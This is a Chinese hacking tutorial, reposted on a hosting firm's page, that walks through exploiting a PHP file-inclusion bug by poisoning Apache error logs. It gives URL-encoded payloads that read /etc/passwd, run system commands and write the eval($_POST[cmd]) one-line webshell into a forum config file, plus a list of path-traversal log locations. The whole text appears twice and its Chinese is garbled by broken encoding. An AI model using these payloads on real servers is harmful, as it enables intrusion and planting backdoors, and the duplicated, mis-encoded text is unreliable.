|
關(guān)于php包含Apache日志的利用,其實(shí)也就是利用提交的網(wǎng)址里有php語句�����,然后再被Apache服務(wù)器的日志記錄��,然后php再去包含執(zhí)行����,從而包含了去執(zhí)行。當(dāng)然��,這種辦法最大的弊端是Apache日志肯定會(huì)過大�����,回應(yīng)的時(shí)候當(dāng)然會(huì)超時(shí)什么的���,所以也是受條件限制的��。全當(dāng)一種研究算了。下面是我的測(cè)試過程�����,我覺得很有意思�,你也看看�����。
比如說,在一個(gè)php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段:
<? include($zizzy); ?> //包含變量$zizzy
你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含語句來查看一些系統(tǒng)環(huán)境和密碼檔文件。
那么關(guān)于日志包含下面我們來看:
比如我們的Apache的服務(wù)器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf����,來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
讀出Apache的配置信息,這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>
而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯(cuò)誤日志記錄
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk
而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的�����,一樣可以讀出來,只不過文件會(huì)很大,那也沒意思測(cè)試下去了�,那怎么利用呢。
比如我們提交要提交這句,<?phpinfo();?> //查看php的相關(guān)信息
在這里����,我們只能提交URL編碼模式,因?yàn)槲以跍y(cè)試中發(fā)現(xiàn)�,<?的標(biāo)記并不被記錄�����,只有轉(zhuǎn)換成URL編碼提交才會(huì)被完整記錄。
在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過了的<?phpinfo();?>�����,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
這樣肯定會(huì)報(bào)出錯(cuò)找不到頁面����,而一出錯(cuò)就被記在錯(cuò)誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個(gè)日志文件就被包含成了phpinfo的信息����,而回顯也就成了一個(gè)顯示php信息的頁面��。
如果可以的話(能夠執(zhí)行系統(tǒng)命令����,也就是safe_mode開著的時(shí)候)����,
這樣子也不錯(cuò)��,
<?system("ls+-la+/home");?> //執(zhí)行命令列出home下的文件列表,記得轉(zhuǎn)換為URL格式哦����。
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
因?yàn)樯厦婺莻(gè)很不實(shí)際��,我在測(cè)試中發(fā)現(xiàn)日志動(dòng)不動(dòng)就是幾十兆����,那樣玩起來也沒意思了��。下面想的再深入一點(diǎn)也就是我們寫入一個(gè)很實(shí)際的webshell來用�����,也比上面那種慢的要死好很多。
比如還是這句一句話木馬
<?eval($_POST[cmd]);?>
到這里你也許就想到了��,這是個(gè)很不錯(cuò)的辦法�����。接著看,如何寫入就成了個(gè)問題,用這句�,
fopen打開/home/virtual/www.xxx.com/forum/config.php這個(gè)文件,然后寫入<?eval($_POST[cmd]);?>這個(gè)一句話木馬服務(wù)端語句����。連起來表達(dá)成php語句就是
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //在config.php里寫入一句木馬語句
我們提交這句,再讓Apache記錄到錯(cuò)誤日志里,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功����。
轉(zhuǎn)換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
這樣就錯(cuò)誤日志里就記錄下了這行寫入webshell的代碼���。
我們?cè)賮戆罩�,提?br />
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣webshell就寫入成功了��,config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個(gè)就成了我們的webshell
直接用lanker的客戶端一連�,主機(jī)就是你的了����。
PS:上面講的�����,前提是文件夾權(quán)限必須可寫 ����,一定要-rwxrwxrwx(777)才能繼續(xù),這里直接用上面列出的目錄來查看�����。上面講的都是在知道日志路徑的情況下的利用
其他的日志路徑���,你可以去猜����,也可以參照這里�。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
關(guān)于php包含Apache日志的利用,其實(shí)也就是利用提交的網(wǎng)址里有php語句����,然后再被Apache服務(wù)器的日志記錄�����,然后php再去包含執(zhí)行�����,從而包含了去執(zhí)行�。當(dāng)然��,這種辦法最大的弊端是Apache日志肯定會(huì)過大����,回應(yīng)的時(shí)候當(dāng)然會(huì)超時(shí)什么的����,所以也是受條件限制的。全當(dāng)一種研究算了��。下面是我的測(cè)試過程��,我覺得很有意思�,你也看看���。
比如說�,在一個(gè)php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段:
<? include($zizzy); ?> //包含變量$zizzy
你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含語句來查看一些系統(tǒng)環(huán)境和密碼檔文件。
那么關(guān)于日志包含下面我們來看:
比如我們的Apache的服務(wù)器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf��,來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
讀出Apache的配置信息���,這里列出部分信息�����。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>
而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯(cuò)誤日志記錄
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk
而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過文件會(huì)很大���,那也沒意思測(cè)試下去了,那怎么利用呢。
比如我們提交要提交這句���,<?phpinfo();?> //查看php的相關(guān)信息
在這里,我們只能提交URL編碼模式,因?yàn)槲以跍y(cè)試中發(fā)現(xiàn),<?的標(biāo)記并不被記錄����,只有轉(zhuǎn)換成URL編碼提交才會(huì)被完整記錄�����。
在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過了的<?phpinfo();?>��,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
這樣肯定會(huì)報(bào)出錯(cuò)找不到頁面,而一出錯(cuò)就被記在錯(cuò)誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個(gè)日志文件就被包含成了phpinfo的信息�,而回顯也就成了一個(gè)顯示php信息的頁面����。
如果可以的話(能夠執(zhí)行系統(tǒng)命令�,也就是safe_mode開著的時(shí)候),
這樣子也不錯(cuò)��,
<?system("ls+-la+/home");?> //執(zhí)行命令列出home下的文件列表���,記得轉(zhuǎn)換為URL格式哦���。
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>�,
這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
因?yàn)樯厦婺莻(gè)很不實(shí)際����,我在測(cè)試中發(fā)現(xiàn)日志動(dòng)不動(dòng)就是幾十兆�����,那樣玩起來也沒意思了����。下面想的再深入一點(diǎn)也就是我們寫入一個(gè)很實(shí)際的webshell來用,也比上面那種慢的要死好很多����。
比如還是這句一句話木馬
<?eval($_POST[cmd]);?>
到這里你也許就想到了���,這是個(gè)很不錯(cuò)的辦法���。接著看,如何寫入就成了個(gè)問題����,用這句����,
fopen打開/home/virtual/www.xxx.com/forum/config.php這個(gè)文件,然后寫入<?eval($_POST[cmd]);?>這個(gè)一句話木馬服務(wù)端語句。連起來表達(dá)成php語句就是
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //在config.php里寫入一句木馬語句
我們提交這句����,再讓Apache記錄到錯(cuò)誤日志里����,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功�。
轉(zhuǎn)換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
這樣就錯(cuò)誤日志里就記錄下了這行寫入webshell的代碼。
我們?cè)賮戆罩����,提?br />
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣webshell就寫入成功了���,config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個(gè)就成了我們的webshell
直接用lanker的客戶端一連,主機(jī)就是你的了��。
PS:上面講的�����,前提是文件夾權(quán)限必須可寫 �,一定要-rwxrwxrwx(777)才能繼續(xù)����,這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用
其他的日志路徑����,你可以去猜����,也可以參照這里。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【www.zuiquanben.com】
服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)��!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
